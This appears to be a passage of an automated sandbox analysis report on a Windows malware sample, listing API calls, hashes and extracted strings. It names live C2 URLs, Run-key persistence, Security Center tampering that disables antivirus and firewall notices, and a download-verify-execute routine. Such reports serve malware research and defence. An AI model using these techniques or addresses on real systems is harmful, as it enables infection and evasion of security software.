                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(0041AA40), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 459949847-0
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:55.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:36.8%
                                                                                Total number of Nodes:144
                                                                                Total number of Limit Nodes:12
                                                                                execution_graph 281 db1f29 302 db24bc 281->302 283 db1f35 GetStartupInfoA 284 db1f63 InterlockedCompareExchange 283->284 285 db1f75 284->285 286 db1f71 284->286 288 db1f9f 285->288 289 db1f95 _amsg_exit 285->289 286->285 287 db1f7c Sleep 286->287 287->284 290 db1fc8 288->290 291 db1fa8 _initterm_e 288->291 289->290 293 db1ff2 290->293 294 db1fd7 _initterm 290->294 291->290 292 db1fc3 __onexit 291->292 295 db1ff6 InterlockedExchange 293->295 296 db1ffe __IsNonwritableInCurrentImage 293->296 294->293 295->296 297 db208d _ismbblead 296->297 298 db20d2 296->298 301 db2077 exit 296->301 303 db1840 Sleep CreateMutexA GetLastError 296->303 297->296 298->292 299 db20db _cexit 298->299 299->292 301->296 302->283 304 db1909 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW 303->304 305 db1901 ExitProcess 303->305 329 db1000 CryptAcquireContextW 304->329 307 db19b4 wcscmp 308 db1b7c Sleep RegOpenKeyExA 307->308 309 db19d2 307->309 310 db1bad 8 API calls 308->310 311 db1c93 RegOpenKeyExA 308->311 330 db1740 memset GetLocaleInfoA strcmp 309->330 310->311 313 db1cb9 8 API calls 311->313 314 db1d9f Sleep 311->314 313->314 327 db1daa 314->327 316 db19df ExitProcess 317 db19e7 ExpandEnvironmentStringsW wsprintfW CopyFileW 318 db1a3b SetFileAttributesW RegOpenKeyExW 317->318 319 db1aac Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 317->319 318->319 320 db1a6c wcslen RegSetValueExW RegCloseKey 318->320 319->308 321 db1b0b SetFileAttributesW RegOpenKeyExW 319->321 320->319 321->308 324 db1b3c wcslen RegSetValueExW RegCloseKey 321->324 322 db1e8c Sleep 322->327 323 db1dd2 Sleep 323->327 324->308 325 db1e05 Sleep wsprintfA DeleteUrlCacheEntry 332 db1790 InternetOpenA 325->332 327->322 327->323 327->325 339 db1320 9 API calls 327->339 329->307 331 db177e 330->331 331->316 331->317 333 db1828 Sleep 332->333 334 db17b6 InternetOpenUrlA 332->334 333->327 335 db181e InternetCloseHandle 334->335 336 db17d5 HttpQueryInfoA 334->336 335->333 337 db17fe 336->337 338 db1814 InternetCloseHandle 336->338 337->338 338->335 340 db155e InternetCloseHandle Sleep 339->340 341 db13e3 InternetOpenUrlW 339->341 344 db166b 340->344 345 db1585 7 API calls 340->345 342 db1412 CreateFileW 341->342 343 db1551 InternetCloseHandle 341->343 346 db1441 memset 342->346 347 db1544 FindCloseChangeNotification 342->347 343->340 344->327 345->344 348 db160a wsprintfW DeleteFileW Sleep 345->348 349 db1457 InternetReadFile 346->349 347->343 350 db1100 24 API calls 348->350 351 db147b 349->351 352 db14aa CloseHandle Sleep wsprintfW DeleteFileW Sleep 349->352 353 db164a 350->353 351->352 357 db1484 WriteFile 351->357 364 db1100 CryptImportKey 352->364 354 db1670 DeleteFileW 353->354 355 db1654 Sleep 353->355 354->344 358 db1690 6 API calls 355->358 357->349 358->344 360 db150c Sleep 385 db1690 memset memset CreateProcessW 360->385 361 db1537 DeleteFileW 361->347 365 db1138 CreateFileW 364->365 366 db1316 364->366 367 db115e GetFileSize 365->367 368 db130c CryptDestroyKey 365->368 366->360 366->361 369 db1302 CloseHandle 367->369 370 db1177 CreateFileMappingA 367->370 368->366 369->368 371 db1198 MapViewOfFile 370->371 372 db12de 370->372 373 db11b7 371->373 374 db12d4 FindCloseChangeNotification 371->374 372->369 375 db12e6 SetFilePointer SetEndOfFile 372->375 376 db12ca UnmapViewOfFile 373->376 377 db11e2 CryptCreateHash 373->377 374->372 375->369 376->374 377->376 378 db1204 GetProcessHeap RtlAllocateHeap 377->378 378->376 379 db1247 378->379 391 db1020 379->391 381 db1263 CryptHashData 382 db127e CryptVerifySignatureA 381->382 383 db12b7 GetProcessHeap HeapFree 381->383 382->383 384 db129f memcpy 382->384 383->376 384->383 386 db16f2 Sleep 385->386 387 db1701 ShellExecuteW 385->387 388 db1523 386->388 389 db1727 Sleep 387->389 390 db1736 387->390 388->347 389->388 390->388 392 db105e memcpy memcpy CryptImportKey 391->392 394 db10c1 CryptEncrypt CryptDestroyKey 392->394 395 db10f6 392->395 394->395 395->381 409 db21e9 412 db2568 409->412 411 db21ee 411->411 413 db259a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 412->413 414 db258d 412->414 415 db2591 413->415 414->413 414->415 415->411 396 db2638 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 397 db272a GetCurrentProcess TerminateProcess 396->397 398 db2722 _crt_debugger_hook 396->398 398->397 416 db2108 418 db2116 __set_app_type _encode_pointer __p__fmode __p__commode 416->418 419 db21b5 _pre_c_init __RTC_Initialize 418->419 420 db21cf 419->420 421 db21c3 __setusermatherr 419->421 426 db253a _controlfp_s 420->426 421->420 424 db21dd _configthreadlocale 425 db21e6 424->425 427 db21d4 426->427 428 db2556 _invoke_watson 426->428 427->424 427->425 428->427 399 db21f3 400 db222f 399->400 402 db2205 399->402 401 db222a ?terminate@ 401->400 402->400 402->401 429 db20a3 _XcptFilter 430 db1ee1 435 db22ef 430->435 433 db1f1e _amsg_exit 434 db1f26 433->434 438 db224a 435->438 437 db1ee6 __getmainargs 437->433 437->434 445 db24bc 438->445 440 db2256 _decode_pointer 441 db2279 7 API calls 440->441 442 db226d _onexit 440->442 446 db22e6 _unlock 441->446 443 db22dd __onexit 442->443 443->437 445->440 446->443 403 db20b7 404 db20cb _exit 403->404 405 db20d2 403->405 404->405 406 db20db _cexit 405->406 407 db20e1 __onexit 405->407 406->407 408 db2515 _except_handler4_common

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00DB1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00DB18E8
                                                                                • GetLastError.KERNEL32 ref: 00DB18F4
                                                                                • ExitProcess.KERNEL32 ref: 00DB1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DB196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 00DB197A
                                                                                • wsprintfW.USER32 ref: 00DB1999
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00DB19A9
                                                                                • wcscmp.MSVCR90 ref: 00DB19C2
                                                                                • ExitProcess.KERNEL32 ref: 00DB19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$http://185.215.113.66/$http://193.233.132.177/$http://91.202.233.141/$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-903396872
                                                                                • Opcode ID: bef250098aef5a439628c782a743f770a640ba81bccfb246cbf9c5bb39022247
                                                                                • Instruction ID: ca7f2e0c2e5a70440880ed7d23354e975ea13ecb8b2c48225b57b88263ee49f8
                                                                                • Opcode Fuzzy Hash: bef250098aef5a439628c782a743f770a640ba81bccfb246cbf9c5bb39022247
                                                                                • Instruction Fuzzy Hash: 4DF123F5A40314EBEB24DF50DC49FE97779AB48704F404688B30AA6290DBB16B88DF75

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,00DB31C8,00000214,00000000,00000000,00000000), ref: 00DB112A
                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00DB1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00DB1185
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DB11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 00DB11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB122D
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DB1234
                                                                                  • Part of subcall function 00DB1020: memcpy.MSVCR90 ref: 00DB107F
                                                                                  • Part of subcall function 00DB1020: memcpy.MSVCR90 ref: 00DB1093
                                                                                  • Part of subcall function 00DB1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 00DB10B7
                                                                                  • Part of subcall function 00DB1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 00DB10DD
                                                                                  • Part of subcall function 00DB1020: CryptDestroyKey.ADVAPI32(00000000), ref: 00DB10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 00DB1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 00DB1295
                                                                                • memcpy.MSVCR90 ref: 00DB12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 00DB12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00DB12CE
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00DB12D8
                                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000), ref: 00DB12F2
                                                                                • SetEndOfFile.KERNELBASE(000000FF), ref: 00DB12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00DB1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 00DB1310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHashImportProcessView$AllocateChangeDataEncryptFindFreeHandleMappingNotificationPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 2706389988-4070929822
                                                                                • Opcode ID: 1e714e8cbb9440874276c6e68a0d60c8dc1baeafd035b81f3c8e3f038cae4d49
                                                                                • Instruction ID: 5dfd11b03ad59389670d0b7af7afb30a54d27e8534350b0d4f700f03096bc5ce
                                                                                • Opcode Fuzzy Hash: 1e714e8cbb9440874276c6e68a0d60c8dc1baeafd035b81f3c8e3f038cae4d49
                                                                                • Instruction Fuzzy Hash: 58611875A00209EBDB14DFE4DC5AFAEBBB5AF48700F148648F601E7280D775AA40CB74

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 100 db1020-db105c 101 db105e-db1064 100->101 102 db1066 100->102 103 db106d-db10bf memcpy * 2 CryptImportKey 101->103 102->103 104 db10c1-db10f0 CryptEncrypt CryptDestroyKey 103->104 105 db10f6-db10fc 103->105 104->105
                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 00DB107F
                                                                                • memcpy.MSVCR90 ref: 00DB1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 00DB10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 00DB10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 00DB10F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: 9cee97771e46878ae171b9f834df2ebd1db762ab76c480d087e623b2d8449c17
                                                                                • Instruction ID: 3f925a62a1f086b1eda7acba0205cf5cf7e7673f6797723c40b9ea9304bb2e84
                                                                                • Opcode Fuzzy Hash: 9cee97771e46878ae171b9f834df2ebd1db762ab76c480d087e623b2d8449c17
                                                                                • Instruction Fuzzy Hash: 783124B5D04249EFDB00CFE8C841BEEBBB4AF48300F008159EA05E7280E7759A48DBB5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 106 db1740-db177c memset GetLocaleInfoA strcmp 107 db177e-db1780 106->107 108 db1782 106->108 109 db1784-db1787 107->109 108->109
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00DB174E
                                                                                • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A), ref: 00DB1763
                                                                                • strcmp.MSVCR90 ref: 00DB1772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 41965c178d848f35ed75459df61e5c8605a6d8458ad24b2179b5ca93fbf233a1
                                                                                • Instruction ID: 3bef70066f9d46d8c3aa3991e50a88393cfe50889c4b41047555d1fe32d262a7
                                                                                • Opcode Fuzzy Hash: 41965c178d848f35ed75459df61e5c8605a6d8458ad24b2179b5ca93fbf233a1
                                                                                • Instruction Fuzzy Hash: 83E0487EE44308F6DA10A6A09C57FD977689B11B02F404554BF06571C1F9B1E71C97F2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 110 db1000-db101a CryptAcquireContextW
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(00DB5018,00000000,00000000,00000018,F0000000), ref: 00DB1013
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
